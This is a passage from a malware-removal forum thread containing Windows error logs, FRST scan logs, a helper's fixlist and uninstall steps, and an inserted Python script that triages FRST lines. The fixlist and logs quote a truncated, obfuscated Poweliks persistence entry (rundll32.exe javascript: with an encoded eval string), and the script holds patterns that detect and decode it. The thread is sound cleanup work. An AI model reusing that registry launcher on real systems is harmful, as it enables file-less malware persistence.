Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000c01e2
Faulting process id: 0x1734
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 09:01:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002301e2
Faulting process id: 0x2150
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:54:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000901e2
Faulting process id: 0xb28
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:48:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002301e2
Faulting process id: 0x1ac8
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:43:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002301e2
Faulting process id: 0xc3c
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:37:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002301e2
Faulting process id: 0x1190
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:31:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000f01e2
Faulting process id: 0x2660
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:26:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000d01e2
Faulting process id: 0x16f0
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 00:34:53 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x612c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/22/2014 08:57:43 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17344 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 23fc

Start Time: 01cfedfd01e4b6f4

Termination Time: 35

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:


System errors:
=============
Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.


Microsoft Office Sessions:
=========================
Error: (10/23/2014 09:06:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000c01e2173401cfef2f22d19544C:\windows\system32\dllhost.exeunknown62ebd526-5b22-11e4-b115-4487fc943a34

Error: (10/23/2014 09:01:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002301e2215001cfef2e6d527987C:\windows\system32\dllhost.exeunknownac5be513-5b21-11e4-b115-4487fc943a34

Error: (10/23/2014 08:54:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000901e2b2801cfef2d6618ca1dC:\windows\system32\dllhost.exeunknowna724207d-5b20-11e4-b115-4487fc943a34

Error: (10/23/2014 08:48:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002301e21ac801cfef2c8f2e33d2C:\windows\system32\dllhost.exeunknownce7ac2d9-5b1f-11e4-b115-4487fc943a34

Error: (10/23/2014 08:43:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002301e2c3c01cfef2bd8d3548aC:\windows\system32\dllhost.exeunknown17c651f6-5b1f-11e4-b115-4487fc943a34

Error: (10/23/2014 08:37:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002301e2119001cfef2b21bab014C:\windows\system32\dllhost.exeunknown61502f2d-5b1e-11e4-b115-4487fc943a34

Error: (10/23/2014 08:31:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000f01e2266001cfef2a3b8fcb57C:\windows\system32\dllhost.exeunknown7c16d73b-5b1d-11e4-b115-4487fc943a34

Error: (10/23/2014 08:26:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000d01e216f001cfef298485db0cC:\windows\system32\dllhost.exeunknownc4681bbb-5b1c-11e4-b115-4487fc943a34

Error: (10/23/2014 00:34:53 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf612c01cfeee6eedf8406C:\Program Files\Internet Explorer\iexplore.exeC:\windows\system32\MSHTML.dlle56d2d56-5ada-11e4-818b-4487fc943a34

Error: (10/22/2014 08:57:43 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe11.0.9600.1734423fc01cfedfd01e4b6f435C:\Program Files\Internet Explorer\iexplore.exe


CodeIntegrity Errors:
===================================
  Date: 2014-08-01 14:14:55.147
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCDFF3.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-08-01 14:14:55.147
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCDFF3.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-08-01 14:14:55.147
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCDFF3.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-08-01 14:14:55.137
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCDFF3.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-25 16:50:12.937
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSC24DE.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-25 16:50:12.921
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSC24DE.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-25 16:50:12.921
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSC24DE.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-25 16:50:12.921
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSC24DE.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-04-16 05:55:41.917
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCB6D0.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-04-16 05:55:41.907
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCB6D0.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: AMD Athlon™ II X2 215 Processor
Percentage of memory in use: 69%
Total physical RAM: 2814.04 MB
Available physical RAM: 864.89 MB
Total Pagefile: 5626.38 MB
Available Pagefile: 2745.5 MB
Total Virtual: 2047.88 MB
Available Virtual: 1903.3 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:440.59 GB) (Free:392.1 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: E3832A6E)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=440.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=25.1 GB) - (Type=12)

==================== End Of Log ============================



#4 Gunto

    Bleepin' Reject Phoenix

  • Malware Response Team
  • 1,291 posts
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA

Posted 25 October 2014 - 02:58 AM

Hi,


Alright, thanks for the logs! Now then, let's get to work. :)


Farbar Recovery Scan Tool

I need you to run a fix with FRST.

  • Open up Notepad, and copy and paste the text in the following box into the Notepad text field:
    HKLM\...\Run: [] => [X]
    HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
    SearchScopes: HKLM - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
    SearchScopes: HKLM - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
    SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
    SearchScopes: HKCU - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
    BHO: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} ->  No File
    Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
    FF Plugin: @microsoft.com/GENUINE -> disabled No File
    S3 SophosVirusRemovalTool; C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe [X]
    S3 MFE_RR; \??\C:\Users\Jude\AppData\Local\Temp\mfe_rr.sys [X]
    S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
    S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
    C:\Users\Jude\Documents\SpyHunter-Installer.exe
    C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
    C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46}
    C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E}
    C:\ProgramData\flashax10.exe
    C:\Users\Jude\gotomypc_540.exe
    C:\Users\Jude\AppData\Local\Temp\catchme.dll
    C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll
    C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll
    C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe
    C:\Users\Jude\AppData\Local\Temp\MSN407.exe
    C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe
    C:\Users\Jude\AppData\Local\Temp\Quarantine.exe
    C:\Users\Jude\AppData\Local\Temp\Refresh.exe
    C:\Users\Jude\AppData\Local\Temp\SHSetup.exe
    C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe
    C:\Users\Jude\AppData\Local\Temp\sqlite3.dll
    C:\Users\Jude\AppData\Local\Temp\sqlite3.exe
    C:\Users\Jude\AppData\Local\Temp\vxocslb.dll
    C:\Users\Jude\AppData\Local\Temp\_is7D79.exe
    CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{56CBD3CF-BF99-4DF5-851F-F5B9B57496A1}\InprocServer32 -> C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll (Microsoft)
    CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
    CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
    S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys
    C:\windows\system32\drivers\hitmanpro37.sys
    C:\ProgramData\Sophos
    C:\ProgramData\HitmanPro
    AlternateDataStreams: C:\Users\Jude\Documents\Grandpa Frank's picture.eml:OECustomProperty
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SophosVirusRemovalTool => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SophosVirusRemovalTool => ""="Service"
    Save it to the same location as FRST as fixlist.txt.
  • Open up FRST, and click the Fix button. If it asks you to reboot in order to complete the fix, please do so.
  • Once it's done fixing things, it will create fixlog.txt in the same folder. Please copy and paste it into your reply.

Uninstall Programs

 

Next, I'll need you to uninstall a few programs. But before you do, I need to ask: do you use the following programs? If not, please remove them as per the instructions below:

 

Adobe Reader XI (11.0.09) (perfectly legitimate, but commonly targeted by malware, so it's best to get rid of it if you don't need it)

ESET Online Scanner v3 (once you use it once, you shouldn't need it again)

Java 7 Update 71 (also legit, but this is outdated, and Java (especially older versions) is also frequently targeted by malware, so it's good not to have it if you don't need it. I will have you install the latest version later if you do need it)

LTCM Client (I've heard some bad things about this one, so I advise you to get rid of it)

Windows Live Messenger (Microsoft stopped supporting this quite a while ago, and since you have Skype, there really isn't any reason for you to have it)

 

I need you to uninstall some programs using either Programs and Features or Revo Uninstaller.

If you want to use Programs and Features:

  • Go to Start > Control Panel > Programs and Features.
  • Once it loads all the programs, uninstall the following, if present, one at a time:
    Adobe Reader XI (11.0.09)

    Avast Free Antivirus

    Coupon Printer for Windows

    ESET Online Scanner v3

    Java 7 Update 71

    LTCM Client

    SpyHunter

    Windows Live Messenger
    by clicking Change/Remove, and following the prompts in the uninstaller.

If you have any problems uninstalling a program using Programs and Features, proceed to the below method.

If you want to use Revo Uninstaller (which cleans up a bit better):

  • Download Revo from here, and save it to your desktop.
  • Double click the installer on your desktop, and let the program install.
  • Once it's done, double click the Revo Uninstaller shortcut on your desktop to run it. Once it loads all the programs, uninstall the following, if present, one at a time:
    Adobe Reader XI (11.0.09)

    Avast Free Antivirus

    Coupon Printer for Windows

    ESET Online Scanner v3

    Java 7 Update 71

    LTCM Client

    SpyHunter

    Windows Live Messenger

  • Double click the program, and say Yes on the prompt. Ensure the Moderate option is ticked, and click Next.
  • Follow the prompts in the built-in uninstaller, and then click Next in Revo.
  • If any registry remnants are found, check the bold items only. If there is a closed folder visible, click the + to expand it until you find the bold item. Then Delete the remnants.
  • Proceed again, and if any files/folders were found, delete those, too.

Finally, I'd like you to rerun a FRST scan to get a fresh look at your system. You will only have one text file to copy and paste this time. Also, how's your PC running now? :)

 

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...

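As an added illustration of why the FRST fixlist above deletes a registry value rather than a file, here is a small triage script (my own example, not FRST's code and not part of Gunto's post): it walks FRST-style log lines constructed from entries quoted in this thread, flags the patterns the fix removes, and undoes the one-character code-point shift in the localserver32 entry's eval() string so the hidden JavaScript prefix becomes readable. The search-domain watchlist and the line format are assumptions taken from this page's log, and only the truncated prefix shown in the log is decoded.

```python
"""Triage helper for FRST-style log lines (added example, not FRST's own code).

The localserver32 entry flagged "Poweliks" in the log above is registry-only
persistence: rundll32.exe loads mshtml and runs the JavaScript stored in the
value, and that script eval()s a string whose every character has been shifted
up by one code point. Undoing the shift makes the hidden code readable, which
is how a responder confirms what the value does before the fix deletes it.
"""
import re
from urllib.parse import urlparse

# Constructed sample input, modelled on lines quoted in this thread.
SAMPLE_LINES = r"""
HKLM\...\Run: [LenovoFSC] => C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe [49152 2009-07-29] (Lenovo (Shenzhen) Electronic Co., Ltd.)
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds
SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?searchfor={searchTerms}
S3 MFE_RR; \??\C:\Users\Jude\AppData\Local\Temp\mfe_rr.sys [X]
BHO: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} ->  No File
SearchScopes: HKCU - {4FA18F2D-C961-4586-BD6C-A753A39CF7C1} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
""".strip("\n").splitlines()

# Search domains seen in this thread's log; an assumed watchlist, extend as needed.
SEARCH_WATCHLIST = ("mywebsearch.com", "tb.ask.com")

OBFUSCATED_EVAL = re.compile(r'eval\("([^"]+)')
SCOPE_URL = re.compile(r"URL = (\S+)")


def unshift(text: str, shift: int = 1) -> str:
    """Reverse the per-character code-point shift used in the eval() string."""
    return "".join(chr(ord(ch) - shift) for ch in text)


def classify(line: str):
    """Return a reason if the line matches something the fixlist removes, else None."""
    if "rundll32.exe javascript:" in line:
        return "script launcher stored in a COM registration (file-less, Poweliks pattern)"
    if line.rstrip().endswith("[X]"):
        return "service or driver whose backing file is missing"
    if "No File" in line:
        return "browser add-on registration pointing at a missing file"
    if line.startswith("SearchScopes:"):
        m = SCOPE_URL.search(line)
        host = urlparse(m.group(1)).hostname if m else None
        if host and any(host == d or host.endswith("." + d) for d in SEARCH_WATCHLIST):
            return f"search provider pointing at watchlisted domain {host}"
    return None


def triage(lines):
    """Return (line_number, reason, decoded_script_or_None) for each suspicious line."""
    findings = []
    for number, line in enumerate(lines, 1):
        reason = classify(line)
        if reason is None:
            continue
        decoded = None
        m = OBFUSCATED_EVAL.search(line)
        if m:
            # FRST truncates the value, so only the visible prefix can be decoded.
            decoded = unshift(m.group(1))
        findings.append((number, reason, decoded))
    return findings


if __name__ == "__main__":
    for number, reason, decoded in triage(SAMPLE_LINES):
        print(f"line {number}: {reason}")
        if decoded is not None:
            print(f"    decoded script prefix: {decoded!r}")
```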

#5 sysadmin74

sysadmin74
  • Topic Starter

  • Members
  • 21 posts

Posted 26 October 2014 - 10:10 PM

As an update to this issue, I was able to remove a Trojan on Friday night running a McAfee antivirus scan.  The PC has not exhibited the issues I initially described since Friday night.  I'm not sure which file you needed from the latest FRST scan I ran, so I've pasted both here.  Could you please take a look and let me know if anything looks suspicious?  I appreciate your assistance offered for this issue.  I removed all the programs you suggested except for Adobe Acrobat Reader version 11, which I use quite frequently.

 

FRST scan results 10/26/2014:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 26-10-2014
Ran by Jude (administrator) on GERSTNER-PC on 26-10-2014 21:56:48
Running from C:\Users\Jude\Documents
Loaded Profile: Jude (Available profiles: Jude)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\EpsonCustomerParticipation\EPCP.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Lenovo (Shenzhen) Electronic Co., Ltd.) C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Lenovo) C:\Program Files\Lenovo\HealthCare\HealthCare.exe
(CyberLink) C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Epson Software\Event Manager\EEventManager.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\w32x86\3\E_FATIHQA.EXE
(Skype Technologies S.A.) C:\Program Files\Skype\Phone\Skype.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2mainh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2host.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2audioh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2printh.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
(McAfee, Inc.) C:\Program Files\McAfee\VirusScan\mcods.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\Core\mchost.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [LenovoFSC] => C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe [49152 2009-07-29] (Lenovo (Shenzhen) Electronic Co., Ltd.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2009-07-10] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7830048 2009-10-13] (Realtek Semiconductor)
HKLM\...\Run: [Healthcare] => C:\Program Files\Lenovo\HealthCare\HealthCare.exe [827392 2009-09-28] (Lenovo)
HKLM\...\Run: [CLMLServer] => C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-06-03] (CyberLink)
HKLM\...\Run: [UpdateP2GoShortCut] => C:\Program Files\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM\...\Run: [IdeaNotesUser] => C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe [221872 2009-08-24] (Digital Delivery Networks, Inc.)
HKLM\...\Run: [EEventManager] => C:\Program Files\Epson Software\Event Manager\EEventManager.exe [979328 2010-10-12] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
